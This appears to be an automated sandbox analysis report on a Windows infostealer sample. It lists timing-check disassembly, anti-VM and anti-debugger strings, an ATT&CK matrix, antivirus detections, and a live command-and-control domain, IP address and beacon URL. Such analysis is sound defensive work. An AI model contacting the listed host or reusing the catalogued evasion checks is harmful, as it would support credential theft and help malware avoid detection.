Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1696 second address: 6EC16B9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F2BDCD5A7AEh 0x0000000b popad 0x0000000c mov eax, dword ptr [esi+24h] 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, 7A50h 0x00000016 movsx edi, ax 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC16B9 second address: 6EC16F9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDC8ABB21h 0x00000009 add cx, 0AD6h 0x0000000e jmp 00007F2BDC8ABB21h 0x00000013 popfd 0x00000014 mov ecx, 1F3AEE47h 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c mov dword ptr [edx+24h], eax 0x0000001f pushad 0x00000020 mov cx, 5F3Fh 0x00000024 push eax 0x00000025 push edx 0x00000026 mov edi, ecx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC16F9 second address: 6EC1728 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F2BDCD5A7AEh 0x00000008 or esi, 79689828h 0x0000000e jmp 00007F2BDCD5A7ABh 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 popad 0x00000017 mov eax, dword ptr [esi+28h] 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e pushad 0x0000001f popad 0x00000020 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1728 second address: 6EC172C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC172C second address: 6EC1732 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1732 second address: 6EC1738 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1738 second address: 6EC173C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC173C second address: 6EC174D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [edx+28h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC174D second address: 6EC1751 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1751 second address: 6EC176E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC176E second address: 6EC17CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ecx 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ecx, dword ptr [esi+2Ch] 0x0000000d pushad 0x0000000e mov dh, B0h 0x00000010 call 00007F2BDCD5A7ACh 0x00000015 mov esi, 627B91E1h 0x0000001a pop esi 0x0000001b popad 0x0000001c mov dword ptr [edx+2Ch], ecx 0x0000001f jmp 00007F2BDCD5A7ADh 0x00000024 mov ax, word ptr [esi+30h] 0x00000028 jmp 00007F2BDCD5A7AEh 0x0000002d mov word ptr [edx+30h], ax 0x00000031 pushad 0x00000032 mov eax, 2933BBFDh 0x00000037 mov ecx, 5B051AF9h 0x0000003c popad 0x0000003d mov ax, word ptr [esi+32h] 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC17CD second address: 6EC17D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC17D1 second address: 6EC17D5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC17D5 second address: 6EC17DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC17DB second address: 6EC1861 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov word ptr [edx+32h], ax 0x0000000d pushad 0x0000000e mov edx, esi 0x00000010 mov ax, 9B49h 0x00000014 popad 0x00000015 mov eax, dword ptr [esi+34h] 0x00000018 jmp 00007F2BDCD5A7B4h 0x0000001d mov dword ptr [edx+34h], eax 0x00000020 pushad 0x00000021 mov si, 002Dh 0x00000025 mov ax, 7229h 0x00000029 popad 0x0000002a test ecx, 00000700h 0x00000030 jmp 00007F2BDCD5A7B4h 0x00000035 jne 00007F2C4D37867Ch 0x0000003b jmp 00007F2BDCD5A7B0h 0x00000040 or dword ptr [edx+38h], FFFFFFFFh 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 pushad 0x00000049 popad 0x0000004a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1861 second address: 6EC1867 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1867 second address: 6EC186D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC186D second address: 6EC1871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1871 second address: 6EC1875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1875 second address: 6EC1895 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+3Ch], FFFFFFFFh 0x0000000c jmp 00007F2BDC8ABB1Ah 0x00000011 or dword ptr [edx+40h], FFFFFFFFh 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1895 second address: 6EC1899 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC1899 second address: 6EC189F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC189F second address: 6EC18F2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F2BDCD5A7B2h 0x00000009 or ecx, 101A7FE8h 0x0000000f jmp 00007F2BDCD5A7ABh 0x00000014 popfd 0x00000015 call 00007F2BDCD5A7B8h 0x0000001a pop eax 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e pop esi 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F2BDCD5A7ACh 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EC18F2 second address: 6EC1950 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b push esi 0x0000000c pushfd 0x0000000d jmp 00007F2BDC8ABB1Bh 0x00000012 xor ah, 0000003Eh 0x00000015 jmp 00007F2BDC8ABB29h 0x0000001a popfd 0x0000001b pop esi 0x0000001c mov ax, di 0x0000001f popad 0x00000020 leave 0x00000021 pushad 0x00000022 jmp 00007F2BDC8ABB29h 0x00000027 pushad 0x00000028 push eax 0x00000029 push edx 0x0000002a rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EB07D1 second address: 6EB07FE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 call 00007F2BDCD5A7ABh 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f jmp 00007F2BDCD5A7AFh 0x00000014 mov ebp, esp 0x00000016 pushad 0x00000017 mov cl, 2Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b pushad 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E5001B second address: 6E50081 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, ax 0x00000006 mov ecx, 415560FFh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov eax, 05C070F7h 0x00000015 push esi 0x00000016 pushfd 0x00000017 jmp 00007F2BDC8ABB23h 0x0000001c xor ecx, 1D09E57Eh 0x00000022 jmp 00007F2BDC8ABB29h 0x00000027 popfd 0x00000028 pop esi 0x00000029 popad 0x0000002a push eax 0x0000002b jmp 00007F2BDC8ABB1Eh 0x00000030 xchg eax, ebp 0x00000031 pushad 0x00000032 mov ax, C38Dh 0x00000036 push eax 0x00000037 push edx 0x00000038 movzx ecx, bx 0x0000003b rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50081 second address: 6E5009D instructions: 0x00000000 rdtsc 0x00000002 mov di, 07A8h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov ebp, esp 0x0000000b pushad 0x0000000c mov bx, 23C0h 0x00000010 movsx ebx, si 0x00000013 popad 0x00000014 pop ebp 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 mov si, C133h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E507D3 second address: 6E50832 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov si, 366Dh 0x00000007 mov cx, CC69h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F2BDC8ABB21h 0x00000018 adc ecx, 19349C76h 0x0000001e jmp 00007F2BDC8ABB21h 0x00000023 popfd 0x00000024 pushfd 0x00000025 jmp 00007F2BDC8ABB20h 0x0000002a or cx, 6198h 0x0000002f jmp 00007F2BDC8ABB1Bh 0x00000034 popfd 0x00000035 popad 0x00000036 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50832 second address: 6E50890 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7B9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov esi, edx 0x0000000d pushfd 0x0000000e jmp 00007F2BDCD5A7B3h 0x00000013 add ah, FFFFFFBEh 0x00000016 jmp 00007F2BDCD5A7B9h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 pushad 0x00000021 mov bx, ED1Eh 0x00000025 push edi 0x00000026 pop ecx 0x00000027 popad 0x00000028 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50C9D second address: 6E50CA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CA3 second address: 6E50CA7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CA7 second address: 6E50CC7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDC8ABB23h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CC7 second address: 6E50CCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CCB second address: 6E50CCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CCF second address: 6E50CD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CD5 second address: 6E50CDB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6E50CDB second address: 6E50CDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA09CB second address: 6EA09E9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 mov ch, bl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2BDC8ABB1Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA09E9 second address: 6EA09EF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA09EF second address: 6EA09F5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA09F5 second address: 6EA0A10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2BDCD5A7AEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRDTSC instruction interceptor: First address: 6EA0A10 second address: 6EA0A14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSpecial instruction interceptor: First address: B6B9DE instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00609980 rdtsc 0_2_00609980
Source: C:\Users\user\Desktop\2M43DSi2cx.exe TID: 7692Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_004229FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_004229FF
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_0042255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_0042255D
Source: 2M43DSi2cx.exe, 2M43DSi2cx.exe, 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 2M43DSi2cx.exe, 00000000.00000003.1414322461.000000000150A000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414534198.0000000001510000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000003.1414883246.000000000151D000.00000004.00000020.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1425703448.000000000151E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll{\'
Source: 2M43DSi2cx.exeBinary or memory string: Hyper-V RAW
Source: 2M43DSi2cx.exe, 00000000.00000003.1361919011.00000000014B5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllG
Source: 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 2M43DSi2cx.exe, 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 2M43DSi2cx.exe, 00000000.00000003.1368625279.0000000006721000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=:9
Source: C:\Users\user\Desktop\2M43DSi2cx.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\2M43DSi2cx.exeThread information set: HideFromDebuggerJump to behavior
Potentially malicious time measurement code found
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_06E902EF Start: 06E90572 End: 06E903110_2_06E902EF
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\2M43DSi2cx.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: NTICE
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: SICE
Source: C:\Users\user\Desktop\2M43DSi2cx.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\2M43DSi2cx.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeCode function: 0_2_00609980 rdtsc 0_2_00609980
Source: 2M43DSi2cx.exe, 2M43DSi2cx.exe, 00000000.00000002.1424735414.0000000000CFD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Program Manager
Source: C:\Users\user\Desktop\2M43DSi2cx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeQueries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\2M43DSi2cx.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: procmon.exe
Source: 2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: wireshark.exe

Stealing of Sensitive Information

barindex
Infostealer behavior detected
Source: Signature ResultsSignatures: Mutex created, HTTP post and idle behavior
Leaks process information
Source: global trafficTCP traffic: 192.168.2.10:49724 -> 185.121.15.192:80

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
Command and Scripting Interpreter		1
DLL Side-Loading		1
Process Injection		24
Virtualization/Sandbox Evasion		OS Credential Dumping751
Security Software Discovery		1
Exploitation of Remote Services		11
Archive Collected Data		11
Encrypted Channel		Exfiltration Over Other Network MediumAbuse Accessibility Features
CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
DLL Side-Loading		1
Process Injection		LSASS Memory24
Virtualization/Sandbox Evasion		Remote Desktop Protocol1
Data from Local System		2
Ingress Tool Transfer		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
Deobfuscate/Decode Files or Information		Security Account Manager13
Process Discovery		SMB/Windows Admin SharesData from Network Shared Drive3
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook3
Obfuscated Files or Information		NTDS1
Remote System Discovery		Distributed Component Object ModelInput Capture4
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
Software Packing		LSA Secrets1
File and Directory Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
DLL Side-Loading		Cached Domain Credentials216
System Information Discovery		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
2M43DSi2cx.exe51%VirustotalBrowse
2M43DSi2cx.exe42%ReversingLabsWin32.Infostealer.Tinba
2M43DSi2cx.exe100%AviraTR/Crypt.TPM.Gen
2M43DSi2cx.exe100%Joe Sandbox ML

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
home.fivetk5ht.top
185.121.15.192
truefalse
    		high
    s-part-0035.t-0009.t-msedge.net
    		13.107.246.63
    		truefalse
      		high
      httpbin.org
      		34.226.108.155
      		truefalse
        		high

        Contacted URLs

        NameMaliciousAntivirus DetectionReputation
        http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851false
          		high
          https://httpbin.org/ipfalse
            		high

            URLs from Memory and Binaries

            NameSourceMaliciousAntivirus DetectionReputation
            https://curl.se/docs/hsts.html2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpfalse
              		high
              http://html4/loose.dtd2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpfalse
                		high
                https://curl.se/docs/alt-svc.html#2M43DSi2cx.exefalse
                  		high
                  http://home.fivetk5ht.top/zldPR2M43DSi2cx.exe, 00000000.00000003.1414353733.0000000001500000.00000004.00000020.00020000.00000000.sdmpfalse
                    		unknown
                    http://home.fivetk5ht.top/zldPRFrmVFHTtKntGpOv1734579851http://home.fivetk5ht.top/zldPRFrmVFHTtKntGp2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpfalse
                      		high
                      https://httpbin.org/ipbefore2M43DSi2cx.exe, 00000000.00000003.1329725523.00000000071A6000.00000004.00001000.00020000.00000000.sdmp, 2M43DSi2cx.exe, 00000000.00000002.1424245644.00000000009FD000.00000040.00000001.01000000.00000003.sdmpfalse
                        		high
